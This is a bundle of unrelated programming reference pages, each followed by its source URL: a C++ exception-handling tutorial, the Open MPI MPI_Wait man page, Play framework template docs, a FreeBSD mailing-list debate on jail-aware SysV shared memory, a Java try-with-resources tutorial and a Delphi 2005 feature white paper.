        // try block activates exception handling
        try
        {
            if(b == 0)
            {
                // throw custom exception
                throw "Division by zero not possible";
            }
            c = a/b;
        }
        catch(const char* ex)   // catches the exception
        {
            cout << ex;
        }
        return 0;
    }

Output:

    Division by zero not possible

In the code above, we are checking the divisor; if it is zero, we are throwing an exception message, then the catch block catches that exception and prints the message. Doing so, the user will never know that our program failed at runtime; he/she will only see the message "Division by zero not possible". This is gracefully handling the exception condition, which is why exception handling is used.

Multiple catch blocks

The program below contains multiple catch blocks to handle different types of exceptions in different ways:

    #include <iostream>

    using namespace std;

    int main()
    {
        int x[2] = {-1, 2};
        for(int i = 0; i < 2; i++)
        {
            int ex = x[i];
            try
            {
                if (ex > 0)
                    // throwing a numeric value as exception
                    throw ex;
                else
                    // throwing a character as exception
                    throw 'e';
            }
            catch (int ex)   // to catch numeric exceptions
            {
                cout << "Integer exception\n";
            }
            catch (char ex)  // to catch character exceptions
            {
                cout << "Character exception\n";
            }
        }
    }

Output:

    Character exception
    Integer exception

The above program is self-explanatory: if the value of the integer in the array x is greater than 0, we throw a numeric value as exception, and otherwise we throw a character value as exception. And we have two different catch blocks to catch those exceptions.

Generalised catch block in C++

The program below contains a generalised catch block to catch any uncaught errors/exceptions. The catch(...) block takes care of all types of exceptions.

    #include <iostream>

    using namespace std;

    int main()
    {
        int x[2] = {-1, 2};
        for(int i = 0; i < 2; i++)
        {
            int ex = x[i];
            try
            {
                if (ex > 0)
                    throw ex;
                else
                    throw 'e';
            }
            // generalised catch block
            catch (...)
            {
                cout << "Special exception\n";
            }
        }
        return 0;
    }

Output:

    Special exception
    Special exception

In the case above, both the exceptions are caught by a single catch block. We can even have separate catch blocks to handle integer and character exceptions along with the generalised catch block.

There are some standard exceptions in C++ under <exception> which we can use in our programs. They are arranged in a parent-child class hierarchy rooted at std::exception.
https://www.studytonight.com/cpp/exception-handling-in-cpp.php
MPI_Wait - Waits for an MPI send or receive to complete.

C SYNTAX
    #include <mpi.h>
    int MPI_Wait(MPI_Request *request, MPI_Status *status)

FORTRAN SYNTAX
    INCLUDE 'mpif.h'
    MPI_WAIT(REQUEST, STATUS, IERROR)
        INTEGER REQUEST, STATUS(MPI_STATUS_SIZE), IERROR

C++ SYNTAX
    #include <mpi.h>
    void Request::Wait(Status& status)
    void Request::Wait()

INPUT PARAMETER
    request   Request (handle).

OUTPUT PARAMETERS
    status    Status object (status).
    IERROR    Fortran only: Error status (integer).

DESCRIPTION
    A call to MPI_Wait returns when the operation identified by request is
    complete. If the communication object associated with this request was
    created by a nonblocking send or receive call, then the object is
    deallocated by the call to MPI_Wait and the request handle is set to
    MPI_REQUEST_NULL.

    The call returns, in status, information on the completed operation.
    The content of the status object for a receive operation can be
    accessed as described in Section 3.2.5 of the MPI-1 Standard, "Return
    Status." The status object for a send operation may also be queried.

    One is allowed to call MPI_Wait with a null or inactive request
    argument. In this case the operation returns immediately with empty
    status.

    Successful return of MPI_Wait after an MPI_Ibsend implies that the user
    send buffer can be reused, i.e., data has been sent out or copied into
    a buffer attached with MPI_Buffer_attach.

SEE ALSO
    MPI_Comm_set_errhandler
    MPI_File_set_errhandler
    MPI_Test
    MPI_Testall
    MPI_Testany
    MPI_Testsome
    MPI_Waitall
    MPI_Waitany
    MPI_Waitsome
    MPI_Win_set_errhandler

Open MPI 1.2                    March 2007                    MPI_Wait(3OpenMPI)
https://www-lb.open-mpi.org/doc/v1.2/man3/MPI_Wait.3.php
The template engine

Play has an efficient templating system which allows you to dynamically generate HTML, XML, JSON or any text-based formatted document. The template engine uses Groovy as an expression language. A tag system allows you to create reusable functions.

Templates are stored in the app/views directory.

Template syntax

A template file is a text file, some parts of which have placeholders for dynamically generated content. The template's dynamic elements are written using the Groovy language. Groovy's syntax is very close to Java's.

Dynamic elements are resolved during template execution. The rendered result is then sent as part of the HTTP response.

Expressions: ${…}

The simplest way to make a dynamic element is to declare an expression. The syntax used here is ${…}. The result of evaluating the expression is inserted in place of the expression. For example:

    <h1>Client ${client.name}</h1>

If you can't be sure that client is not null, there is a Groovy shortcut:

    <h1>Client ${client?.name}</h1>

Which will only display the client name if the client is not null.

Template decorators: #{extends /} and #{doLayout /}

Decorators provide a clean solution to share a page layout (or design) across several templates. Use #{get} and #{set} tags to share variables between the template and the decorator. Embedding a page in a decorator is the matter of a one-liner:

    #{extends 'simpledesign.html' /}
    #{set title:'A decorated page' /}
    This content will be decorated.

The decorator: simpledesign.html

    <html xmlns="" xml:
    <head>
        <title>#{get 'title' /}</title>
        <link rel="stylesheet" type="text/css" href="@{'/public/stylesheets/main.css'}" />
    </head>
    <body>
        <h1>#{get 'title' /}</h1>
        #{doLayout /}
        <div class="footer">Built with the play! framework</div>
    </body>
    </html>

Tags: #{tagName /}

A tag is a template fragment that can be called with parameters. If the tag has only one parameter, by convention it is called "arg" and its name can be omitted. For example, this tag inserts a SCRIPT tag to load a JavaScript file:

    #{script 'jquery.js' /}

A tag has to be closed, either directly or by an end tag:

    #{script 'jquery.js' /}

or

    #{script 'jquery.js'}#{/script}

For example, the list tag allows iteration over any collection. It takes two mandatory parameters:

    <h1>Client ${client.name}</h1>
    <ul>
    #{list items:client.accounts, as:'account'}
        <li>${account}</li>
    #{/list}
    </ul>

Actions: @{…} or @@{…}

You can use the Router to (reverse) generate a URL corresponding to a specified route. From a template you can use the special @{…} syntax to do that. For example:

    <h1>Client ${client.name}</h1>
    <p>
        <a href="@{Clients.showAccounts(client.id)}">All accounts</a>
    </p>
    <hr />
    <a href="@{Clients.index()}">Back</a>

The @@{…} syntax does the same but generates an absolute URL (notably useful for e-mail).

Messages: &{…}

If your application needs internationalization you can use the &{…} syntax to display an internationalized message. For example, in the file conf/messages we specify:

    clientName=The client name is %s

To display this message in a template, simply use:

    <h1>&{'clientName', client.name}</h1>

Comment: *{…}*

Comments aren't evaluated by the template engine. They are just comments…

    *{**** Display the user name ****}*
    <div class="name">
        ${user.name}
    </div>

Scripts: %{…}%

A script is a more complicated set of expressions. A script can declare some variables and define some statements. Use the %{…}% syntax to insert a script.

    %{
        fullName = client.name.toUpperCase()+' '+client.forname;
    }%

    <h1>Client ${fullName}</h1>

A script can write dynamic content directly using the out object:

    %{
        fullName = client.name.toUpperCase()+' '+client.forname;
        out.print('<h1>'+fullName+'</h1>');
    }%

You can use a script to create a structure such as an iteration in your template:

    <h1>Client ${client.name}</h1>
    <ul>
    %{
        for(account in client.accounts) {
    }%
        <li>${account}</li>
    %{
        }
    }%
    </ul>

Bear in mind that a template is not a place to do complex things. So, use a tag when you can, or move the computations into the controller or the model object.

Template inheritance

A template can inherit another template, i.e. it can be included as a part of another template. To inherit another template, use the extends tag:

    #{extends 'main.html' /}

    <h1>Some code</h1>

The main.html template is a standard template, but it uses the doLayout tag to include the content:

    <h1>Main template</h1>

    <div id="content">
        #{doLayout /}
    </div>

Custom template tags

You can easily create specific tags for your application. A tag is a simple template file, stored in the app/views/tags directory. The template's file name is used as the tag name.

To create a hello tag, just create the app/views/tags/hello.html file:

    Hello from tag!

No need to configure anything. You can use the tag directly:

    #{hello /}

Retrieve tag parameters

Tag parameters are exposed as template variables. The variable names are constructed with the '_' character prepended to the parameter name. For example:

    Hello ${_name} !

And you can pass the name parameter to the tag:

    #{hello name:'Bob' /}

If your tag has only one parameter, you can use the fact that the default parameter name is arg and that its name is implicit. Example:

    Hello ${_arg}!

And you can call it easily using:

    #{hello 'Bob' /}

Invoke tag body

If your tag supports a body, you can include it at any point in the tag code, using the doBody tag. For example:

    Hello #{doBody /}!

And you can then pass the name as the tag body:

    #{hello}
        Bob
    #{/hello}

Format-specific tags

You can have different versions of a tag for different content types and Play will select the appropriate tag. For example, Play will use the app/views/tags/hello.html tag when request.format is html, and app/views/tags/hello.xml when the format is xml. Whatever the content type, Play will fall back to the .tag extension if a format-specific tag is not available, e.g. app/views/tags/hello.tag.

Custom Java tags

You can also define custom tags in Java code. Similarly to how JavaExtensions work by extending the play.templates.JavaExtensions class, to create a FastTag you need to create a method in a class that extends play.templates.FastTags. Each method that you want to execute as a tag must have the following method signature:

    public static void _tagName(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine)

Note the underscore before the tag name.

To understand how to build an actual tag, let's look at two of the built-in tags. For example, the verbatim tag is implemented by a one-line method that simply calls the toString method on the JavaExtensions, and passes in the body of the tag:

    public static void _verbatim(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) {
        out.println(JavaExtensions.toString(body));
    }

The body of the tag would be anything between the open and close tag. So for

    <verbatim>My verbatim</verbatim>

the body value would be

    My verbatim

The second example is the option tag, which is slightly more complex because it relies on a parent tag to function:

    public static void _option(Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) {
        Object value = args.get("arg");
        Object selection = TagContext.parent("select").data.get("selected");
        boolean selected = selection != null && value != null && selection.equals(value);
        out.print("<option value=\"" + (value == null ? "" : value) + "\" "
            + (selected ? "selected=\"selected\"" : "") + ""
            + serialize(args, "selected", "value") + ">");
        out.println(JavaExtensions.toString(body));
        out.print("</option>");
    }

This code works by outputting an HTML option tag, and sets the selected value by checking which value is selected from the parent tag. The first three lines set variables for use in the output. Then, the final three lines output the result of the tag.

There are many more examples in the source code for the built-in tags, with varying degrees of complexity. See FastTags.java in github.

Tag namespaces

To ensure that your tags do not conflict between projects, or with the core Play tags, you can set up namespaces, using the class-level annotation @FastTags.Namespace.

So, for a hello tag in a my.tags namespace, you would do the following:

    @FastTags.Namespace("my.tags")
    public class MyFastTag extends FastTags {
        public static void _hello (Map<?, ?> args, Closure body, PrintWriter out, ExecutableTemplate template, int fromLine) {
            ...
        }
    }

and then in your templates, you would reference the hello tag as

    #{my.tags.hello/}

Java object extensions in templates

When you use your Java object within the template engine, new methods are added to it. These methods don't exist in the original Java class and are dynamically added by the template engine. For example, to allow easy number formatting in a template, a format method is added to java.lang.Number. It's then very easy to format a number:

    <ul>
    #{list items:products, as:'product'}
        <li>${product.name}. 
Price: ${product.price.format('## ###,00')} €</li> #{/list} </ul> The same applies to java.util.Date. The Java extensions manual page lists the available methods, by type. Create custom extensions Your project may have specific formatting needs, in which case you can provide your own extensions. You only need to create a Java class extending play.templates.JavaExtensions. For instance, to provide a custom currency formatter for a number: package ext; import play.templates.JavaExtensions; public class CurrencyExtensions extends JavaExtensions { public static String ccyAmount(Number number, String currencySymbol) { String format = "'"+currencySymbol + "'#####.##"; return new DecimalFormat(format).format(number); } } Each extension method is a static method and should return a java.lang.String to be written back in the page. The first parameter will hold the enhanced object. Use your formatter like this: <em>Price: ${123456.324234.ccyAmount()}</em> Template extension classes are automatically detected by Play at start-up. You just have to restart your application to make them available. Implicit objects available in a template All objects added to the renderArgs scope are directly injected as template variables. For instance, to inject a ‘user’ bean into the template from a controller: renderArgs.put("user", user ); When you render a template from an action, the framework also adds implicit objects: In addition to the list above the names owner, delegate and it are reserved in Groovy and shouldn’t be used as variable names in templates. Next: Form data validation
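The ccyAmount extension above delegates its formatting to java.text.DecimalFormat, quoting the currency symbol so the pattern treats it as a literal prefix. A standalone sketch of just that formatting logic (outside Play; the class name and the fixed US locale are choices made for this example, not part of the original code):

```java
import java.text.DecimalFormat;
import java.text.DecimalFormatSymbols;
import java.util.Locale;

public class CcyAmountSketch {
    // Mirrors the ccyAmount extension: single quotes around the symbol make
    // DecimalFormat treat it as a literal prefix, not as pattern characters.
    public static String ccyAmount(Number number, String currencySymbol) {
        String pattern = "'" + currencySymbol + "'#####.##";
        // Pin the locale so the decimal separator is predictable in tests;
        // the Play extension uses the default locale instead.
        DecimalFormat df = new DecimalFormat(pattern,
                DecimalFormatSymbols.getInstance(Locale.US));
        return df.format(number);
    }

    public static void main(String[] args) {
        System.out.println(ccyAmount(123456.324234, "$")); // $123456.32
        System.out.println(ccyAmount(5, "$"));             // $5
    }
}
```

Note that ".##" limits the fraction to at most two digits (rounded) while allowing zero, which is why the integer 5 is printed without a decimal part.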
https://www.playframework.com/documentation/1.2.4/templates
On Tue, Jun 16, 2015 at 03:45:34AM +0900, kikuc...@uranus.dti.ne.jp wrote:
> On Mon, 15 Jun 2015 12:49:16 +0200, Mateusz Guzik <mjgu...@gmail.com> wrote:
> > Fundamentally the basic question is how does the implementation cope
> > with processes having sysvshm mappings obtained from 2 different jails
> > (provided they use different sysvshms).
> >
> > Preferably the whole business would be /prevented/. A prevention mechanism
> > would have to deal with shared address spaces (rfork(2) + RFMEM),
> > threads and pre-existing mappings.
> >
> > The patch posted here just puts permission checks in several places,
> > while leaving the namespace shared, which I find to be a user-visible
> > hack with no good justification. There is also no analysis of how this
> > behaves when presented with the aforementioned scenario. Even if it turns
> > out the result is harmless with the resulting code, this leaves us with a
> > very error-prone scheme.
> >
> > There is no technical problem adding a pointer to struct prison and
> > dereferencing it instead of the current global vars. Adding proper sysctls
> > dumping the content for a given jail is trivial, and so is providing
> > resource limits when creating a first-level jail with a separate
> > sysvshm. Something which cannot be as easily achieved with the patch in
> > question.
>
> Could you try the latest patch, please?
> I justify the user visibility, make it hierarchical-jail friendly, and use
> EINVAL instead of EACCES to conceal an information leak.
> (typo fixed)
>
> I realized my method is a bit better when trying to port/write the real
> namespace separation.
> Let me explain (again) why I chose this method for SysV IPC, and could you
> tell me how it should be, please?
>
>     struct shmmap_state {
>         vm_offset_t va;
>         int shmid;
>     };
>
> In sysv_shm.c, struct shmmap_state exists per process as
> p->p_vmspace->vm_shm, and is a lookup table for va -> shm object lookups.
> The shmmap_state entry holds a reference (here, shmid) to the shm object
> for a later detach, and entries are simply copied on fork.
>
> If you split the namespace (including the shmid space) completely, shmid
> would no longer be a unique identifier for an IPC object in the kernel.
> To make it unique, adding a reference to the prison into shmmap_state like
> this:
>
>     struct shmmap_state {
>         vm_offset_t va;
>         struct prison *prison;
>         int shmid;
>     };
>
> would be a bad idea, because after a process calls jail_attach(), the
> process holds a reference to another (creator) prison - or should the IPC
> object be copied completely every time jail_attach() occurs?

As I explained in the previous thread, with a separate namespace it is a
strict requirement to prevent sharing of sysvshm mappings. With the
requirement met, there is no issue. As you will see later in the mail, even
your approach would benefit greatly from having such a restriction.

> How do you deal with hierarchical jails?

If proper resource limiting for hierarchical jails is implemented, the new
jail either inherits or gets a new namespace, depending on the options used.
With only simplistic support, first-level jails can inherit or get a new
namespace; the rest must inherit. There is no issue here due to sharing
prevention.

> My method didn't touch anything about the mapping stuff, thus it behaves
> exactly the same as current FreeBSD behaves on this point.

Sure it did. As you noticed yourself, it makes sense to clean up sysvshms on
jail destruction, which you do in sysvshm_cleanup_for_prison_myhook. Your
code does:

    if ((shmseg->u.shm_perm.mode & SHMSEG_ALLOCATED) &&
        shmseg->cred->cr_prison == pr) {
            shm_remove(shmseg, i);
    ....

which differs from what is executed by kern_shmdt_locked.

Now let's consider a process which rforks and shares the address space with
its child. The child enters a jail and grabs a sysvshm mapping, then exits,
and we kill the jail. In effect we get a process with an address space which
used a mapping created in a now-destroyed jail.

Is this situation problematic? I don't see any analysis provided. Maybe it
is; maybe it so happens it is not. The mere possibility of this scenario
needlessly complicates maintenance, and such a scenario likely has no
practical purpose. As such, it is best /prevented/. With it prevented, there
is nothing positive about your approach that I could see.

> I'm not sure I properly understand what the shared address space problem
> is (could someone help me to understand, perhaps in code?), and I'm not
> sure whether current FreeBSD has the shared address space problem for
> sysvshm combined with jails.
> If it has the problem, unfortunately my patch doesn't provide any solution
> for that, but if not, my patch doesn't have the problem either, because I
> didn't change the code structure.

As I mentioned, you sure did. I don't know if there are any serious problems
/as it is/ and I'm too lazy to check. I surely expect any patch doing
sysvshm for jails to be provided with an analysis of its behaviour in that
regard, though.

> The patch just fixes key_t collisions for jails, nothing more.
> So, the patch is harmless for non-jail users, and I believe it's useful
> for jail users using allow.sysvipc=true.
>
> BTW, what do you think about the following design for jail-aware sysvipc?
>
> - IPC objects created in a parent jail are invisible to its children.
> - IPC objects created in a neighbor jail are also invisible to each other.
> - IPC objects created in a child jail are VISIBLE from the parent.
> - IPC key_t spaces are separated between jails. If you see a key_t named
>   object from the parent, it's shown as IPC_PRIVATE.

How about the following: the jail decides whether it wants to share a
namespace with a particular child (and by extension grandchildren and so
on). Done. There is nothing complicated to do here unless you want to try
out named namespaces which you e.g. assign to different jails on the same
level.

--
Mateusz Guzik <mjguzik gmail.com>
_______________________________________________
freebsd-virtualization@freebsd.org mailing list
To unsubscribe, send any mail to "freebsd-virtualization-unsubscr...@freebsd.org"
https://www.mail-archive.com/freebsd-virtualization@freebsd.org/msg03384.html
The try-with-resources statement automatically closes all the resources at the end of the statement. A resource is an object to be closed at the end of the program. Its syntax is:

    try (resource declaration) {
        // use of the resource
    } catch (ExceptionType e1) {
        // catch block
    }

As seen from the above syntax, we declare the try-with-resources statement by,

- declaring and instantiating the resource within the try clause.
- specifying and handling all exceptions that might be thrown while closing the resource.

Note: The try-with-resources statement closes all the resources that implement the AutoCloseable interface.

Let us take an example that implements the try-with-resources statement.

Example 1: try-with-resources

    import java.io.*;

    class Main {
        public static void main(String[] args) {
            String line;
            try (BufferedReader br = new BufferedReader(new FileReader("test.txt"))) {
                while ((line = br.readLine()) != null) {
                    System.out.println("Line =>" + line);
                }
            } catch (IOException e) {
                System.out.println("IOException in try block =>" + e.getMessage());
            }
        }
    }

Output if the test.txt file is not found:

    IOException in try block =>test.txt (No such file or directory)

Output if the test.txt file is found:

    Line =>test line

In this example, we use an instance of BufferedReader to read data from the test.txt file. Declaring and instantiating the BufferedReader inside the try-with-resources statement ensures that its instance is closed regardless of whether the try statement completes normally or throws an exception. If an exception occurs, it can be handled using the exception handling blocks or the throws keyword.

Suppressed Exceptions

In the above example, exceptions can be thrown from the try-with-resources statement when:

- the file test.txt is not found.
- closing the BufferedReader object fails.

An exception can also be thrown from the try block, as a file read can fail for many reasons at any time. If exceptions are thrown from both the try block and the try-with-resources statement, the exception from the try block is thrown and the exception from the try-with-resources statement is suppressed.

Retrieving Suppressed Exceptions

In Java 7 and later, the suppressed exceptions can be retrieved by calling the Throwable.getSuppressed() method on the exception thrown by the try block. This method returns an array of all suppressed exceptions. We get the suppressed exceptions in the catch block:

    catch (IOException e) {
        System.out.println("Thrown exception =>" + e.getMessage());
        Throwable[] suppressedExceptions = e.getSuppressed();
        for (int i = 0; i < suppressedExceptions.length; i++) {
            System.out.println("Suppressed exception =>" + suppressedExceptions[i]);
        }
    }

Advantages of using try-with-resources

Here are the advantages of using try-with-resources:

1. finally block not required to close the resource

Before Java 7 introduced this feature, we had to use the finally block to ensure that the resource is closed to avoid resource leaks. Here's a program that is similar to Example 1. However, in this program, we have used a finally block to close resources.

Example 2: Close resource using finally block

    import java.io.*;

    class Main {
        public static void main(String[] args) {
            BufferedReader br = null;
            String line;
            try {
                System.out.println("Entering try block");
                br = new BufferedReader(new FileReader("test.txt"));
                while ((line = br.readLine()) != null) {
                    System.out.println("Line =>" + line);
                }
            } catch (IOException e) {
                System.out.println("IOException in try block =>" + e.getMessage());
            } finally {
                System.out.println("Entering finally block");
                try {
                    if (br != null) {
                        br.close();
                    }
                } catch (IOException e) {
                    System.out.println("IOException in finally block =>" + e.getMessage());
                }
            }
        }
    }

Output

    Entering try block
    Line =>line from test.txt file
    Entering finally block

As we can see from the above example, the use of the finally block to clean up resources makes the code more complex. Notice the try...catch block inside the finally block as well? This is because an IOException can also occur while closing the BufferedReader instance inside this finally block, so it is also caught and handled.

The try-with-resources statement does automatic resource management. We need not explicitly close the resources, as the JVM automatically closes them. This makes the code more readable and easier to write.

2. try-with-resources with multiple resources

We can declare more than one resource in the try-with-resources statement by separating them with a semicolon ;

Example 3: try with multiple resources

    import java.io.*;
    import java.util.*;

    class Main {
        public static void main(String[] args) throws IOException {
            try (Scanner scanner = new Scanner(new File("testRead.txt"));
                 PrintWriter writer = new PrintWriter(new File("testWrite.txt"))) {
                while (scanner.hasNext()) {
                    writer.print(scanner.nextLine());
                }
            }
        }
    }

If this program executes without generating any exceptions, the Scanner object reads lines from the testRead.txt file and writes them to a new testWrite.txt file.

When multiple declarations are made, the try-with-resources statement closes these resources in reverse order. In this example, the PrintWriter object is closed first and then the Scanner object is closed.

Java 9 try-with-resources enhancement

In Java 7, there is a restriction on the try-with-resources statement: the resource needs to be declared locally within its block.

    try (Scanner scanner = new Scanner(new File("testRead.txt"))) {
        // code
    }

If we declared the resource outside the block in Java 7, it would have generated an error message.

    Scanner scanner = new Scanner(new File("testRead.txt"));
    try (scanner) {
        // code
    }

To deal with this error, Java 9 improved the try-with-resources statement so that the reference of a resource can be used even if it is not declared locally (provided it is final or effectively final). The above code will now execute without any compilation error.
https://www.programiz.com/java-programming/try-with-resources
By: Anders Ohlsson

Abstract: A Technical White Paper by Bob Swart on all that's new in Delphi 2005

What's New in Delphi 2005?

by Bob Swart, Bob Swart Training & Consultancy (eBob42)

Borland Delphi 2005 Splash Screen

Borland Delphi 2005 is the latest version of Borland Delphi, offering Rapid Application Development for the Microsoft Windows Operating System and the Microsoft .NET Framework version 1.1, with both the Delphi language (for Win32 and .NET 1.1) and C# (for .NET 1.1 only). Delphi 2005 can be seen as having three different personalities: a Win32 personality using the Delphi language (where Delphi 2005 is the successor of Borland Delphi 7), and two .NET personalities: one using Delphi as language (the successor of Borland Delphi 8 for the Microsoft .NET Framework), and the other using C# as language. With respect to the latter personality, Delphi 2005 is the upgrade from Borland C#Builder 1.0. As a result, Delphi 2005 is the next step for current Borland Delphi 3 through 8 and Borland C#Builder developers for rapid application development (RAD) on Win32 as well as the .NET Framework.

[Feel free to suggest others/changes!]

- Support for three different personalities: Delphi for Win32, Delphi for .NET and C#, all from within one development (and debugging) environment.
- Easy migration of Win32 applications to .NET within the same development environment.
- Support for the Delphi language with several enhancements like multi-unit namespaces, for ... in ... do loops, inline functions and other code optimisations.
- Support for WinForms, ASP.NET Web Forms as well as Borland's own VCL framework on .NET, and VCL for Win32, with visual designers to build applications the RAD way.
- Support for heterogeneous database access (using any ADO.NET Data Adapter, not just BdpDataAdapter) as well as multi-tier database applications with new DataSync, DataHub, RemoteServer and RemoteConnection components.
- Support for refactoring to restructure your source code, increasing the maintainability and chances of successful reuse.
- Support for unit testing with DUnit and NUnit, using the extreme unit-test framework in Delphi for Win32, Delphi for .NET and C# projects to increase the quality of your code.
- Support for Enterprise Core Objects II - a UML-compliant Object Model Framework and Object Persistence, with support for databases through the Borland Data Provider, and now also available for ASP.NET.
- Support for ASP.NET with DB Web controls to facilitate the design, implementation and deployment of powerful data-driven Web applications.
- Support for version and team development, with a special backup and history view of your project files, plus optional integration with StarTeam.
- Support for integration with J2EE Enterprise JavaBeans (EJB) or CORBA servers with the Janeva solution for Delphi for .NET and C# applications.

This white paper will discuss the major enhancements in Borland Delphi 2005, grouped by area. First, the Integrated Development Environment (IDE) enhancements are covered, followed by refactoring, unit testing with DUnit and NUnit, enhancements in the database and Web areas, ALM support, and finally Delphi compiler, language and debugging enhancements.

The Delphi 2005 Integrated Development Environment (IDE) is significantly extended and enhanced in nearly every area. The Welcome Page is redesigned, showing not only the recent projects, but also the recent news from Borland Developer Network and RSS news feeds (depending on the availability of an internet connection).

Delphi 2005 supports multiple personalities, featuring Delphi for Win32, Delphi for .NET and C# projects. As a little helpful hint, a personality icon in the IDE toolbar displays the active personality (Delphi for Win32, Delphi for .NET, or C#).
The Delphi 2005 Project Manager now displays the directory structure of the entire project (and for ASP.NET projects even offers the ability to create and manage subdirectories in your project directory), which offers better insight into where files are placed and which files to deploy. Within a Project Group, we can add projects for different targets (and personalities), and switch from one project to another - and hence one personality to another - instantly.

The Project Manager and the Object Inspector now work together, as you can select a file in the Project Manager, which results in the Object Inspector showing information like the file name and full path, plus file-specific properties like the culture, name and version number of assemblies, or the Copy Local option. Most of these properties will be read-only (displayed in grey font), while some can be used to actually change, for example, the filename or Copy Local status.

The Project Manager is also StarTeam-aware and offers context-sensitive commands within the Project Manager for managing projects stored in StarTeam.

The Borland Delphi 2005 IDE transparently maintains multilevel backups and a history of your project source files in a hidden __history directory of your project directory. This replaces the old .~ files. The __history directory can contain multiple versions of your project (by default the latest 10 versions are maintained), and can be used as a local version control repository.

The History View is used to examine the current and backup versions of your project files, and even to view insightful (and intelligent) difference views between two different versions, showing exactly what you added, removed or modified in your source code. Apart from just looking at the differences, you can also revert changes, going back in time to backup versions of your files. The History View also supports StarTeam for an even more complete team view of your project's history (see the ALM section).
Borland Delphi 2005 now offers a choice of free-floating VCL designers, just like Borland Delphi 7 and prior (as opposed to the fixed form designers of Borland Delphi 8). By default, the Embedded Designer is used, but you can uncheck the Embedded Designer option in the VCL Designer node of the Delphi Options.

Delphi 2005 Tools Options dialog

This not only allows you to view your form designer and source code at the same time, it also allows you to simultaneously view multiple forms and data modules at design time.

Borland Delphi 2005 offers a new Sync Edit feature, which allows you to edit multiple occurrences of symbols in a section of selected code (allowing you to rename them all at once, for example). Note that the Sync Edit feature is lexical, and is therefore best used for small portions of source code (like a routine or method implementation). For renaming identifiers within larger portions of source code, it's recommended to use the refactoring features, which use a syntactic and semantic engine instead.

Delphi 2005 SyncEdit in action

The Borland Delphi 2005 IDE offers a new feature called Error Insight, which highlights syntax errors in Delphi, C# or HTML code as you type. Error Insight will display a red squiggle under the syntax error, including a message with more information about the error. This feature helps you to fix syntax errors in your source code before you even have to start to compile your projects. In addition to undeclared identifiers and misspelled keywords and reserved words, Error Insight also identifies symbols that are not in scope (like a type from a namespace which has to be added to the uses or using clause before it can be used).

The Borland Delphi 2005 IDE has an enhanced way to find references, powered by the new refactoring engine, and you can use the results to navigate through your source code.
You can find local references (within a single source file) of symbols (like fields, methods, properties, variables, etc.), or you can find and examine all references, which will go through all source files of your project. The references are presented in a treeview, and each node can be used to quickly navigate through your project. If you double-click on a node, the code editor will bring you to the actual line in the source code. This is a very convenient and quick way to access your project files.

Delphi 2005 Find References treeview result

Find Reference results are always available via the Views menu, and the treeview can even contain multiple results at once, showing the results of previous searches.

The new Help Insight offers help on symbols like classes, properties, methods or events as you type. Help Insight can show up on two different occasions: either as a tooltip popup, or in combination with a Code Insight popup.

A Help Insight tooltip window pops up when moving the mouse in the code editor over a symbol. It produces a tooltip window with information about the specific symbol inside, including relevant links to additional information from the on-line help.

You can also get the Help Insight window in combination with a Code Insight window, in which case Help Insight gives more information about the currently selected Code Insight item. This can be very helpful if you need to select a property, method or event but need to know which one should be selected for a specific purpose you have in mind.
For a source code structure, the Structure View will also dynamically display syntax errors in the top node called 'Errors', which lists all errors found by Error Insight. Delphi 2005 Structure View When viewing the structure of visual components, you can double-click on items in the Structure View to be taken to the specific component in the Forms Designer. When viewing the structure of source code of HTML, you can double-click on items in the Structure View to be taken to the corresponding declaration in the code editor. When performing searches, the results are now displayed in a convenient treeview, with the hits grouped by filename. You can browse through the files, and open the nodes to view the individual hits inside the specific file. The search mechanism of the Tool Palette has been enhanced so that you can now enter the first letter(s) of a component, and immediately only the categories and components that start with this letter(s) are filtered for you, highlighting the letter(s) you typed and filtering further as you type. Pressing enter will place the current selected component on the form in the designer. In addition to showing components (when in design view) or code snippets (when the code editor has the focus), the Tool Palette has been enhanced to also show the wizards from the Object Repository to start new projects, with the Object Repository categories translated into Tool Palette categories. This allows you to easily create new files, projects, and objects from the wizard with a quick hot key. Refactoring is the process of reshaping existing source code by adding structure to it, without changing the behaviour and output of your code, thereby making it easier for actual reuse and maintenance. Borland Delphi 2005 refactoring support includes a number of very helpful new features, from extracting methods to declaring new variables or fields, extracting resource strings, renaming identifiers and refining the namespace and uses clauses. 
Delphi 2005 Refactor Menu

While the Sync Edit feature allows you to lexically rename identifiers in a selected section of source code, for larger sections of source code Delphi 2005 refactoring offers the option to rename symbols (like fields, methods, properties, variables, etc.) using Refactor - Rename. The refactoring dialog will even allow you to view all references before refactoring (so you can verify all places where the rename will be made). This feature adds real refactoring intelligence to the standard search-and-replace functionality, by not just renaming any symbol within the current scope, but only those that are indeed the same as the selected symbol. For example, if you have both a method X and a local variable X, and you want to rename only the method X, Refactor - Rename ensures the local variable X will be left alone, as it recognizes it's not the same as the method X.

While writing source code, it may happen that you use variables before you declare them. Delphi 2005 refactoring allows you to automatically declare these variables using Refactor - Declare Variable, offering you a dialog to enter the specifics, and adding the variable declaration to the current scope. This option is only available for variables that are not yet declared, of course, but will allow you to focus on the code and algorithm logic, without having to manually navigate to the beginning of the scope to add a variable declaration. Declare Variable works well with Error Insight: when an undeclared variable is highlighted by Error Insight, simply right-click on the variable to declare it.

Similar to declaring undeclared variables, Delphi 2005 refactoring offers the ability to declare class fields using Refactor - Declare Field. If the field conflicts with an existing field in the same scope, then the refactoring dialog will allow you to resolve the conflict.
This feature greatly reduces the time needed to extend your classes with fields while writing your source code, without forcing you to return to your class declaration and add the field definition manually.

Delphi 2005 refactoring also allows you to select a portion of source code (which might be a portion that is repeated in several places, or could be used in other places) and extract it into a separate method, using Refactor - Extract Method.

There's nothing harder to localise than a portion of source code that uses hard-coded quoted strings inside. Delphi 2005 refactoring now allows you to extract these quoted strings and replace them with resource strings (adding the resource string declarations to the implementation section of your code).

Sometimes you use classes, methods, fields or types that are defined in another namespace. In order to add the corresponding namespace to the uses (for Borland Delphi) or using (for C#) clause, Delphi 2005 refactoring offers the ability to automatically import the required namespace for a selected identifier, using Refactor - Import Namespace. This feature will save you a lot of time looking up namespaces otherwise.

Unit testing is a methodology of adding tests to your code in such a way that the tests themselves can be run and verified by a test project, reporting the continued validity of your source code. For best results, unit testing should be applied right from the start, adding tests to your classes as you write the actual code itself (some people even believe you should write your tests first, and then the actual code to test). Unit testing can also play a very helpful role when applying refactoring, if only to verify that the resulting refactored source code is still behaving the same - correct - way. A unit testing framework is often called an Xtreme testing framework, related to Xtreme Programming. Delphi 2005 includes both DUnit (for Win32 and .NET) and NUnit.
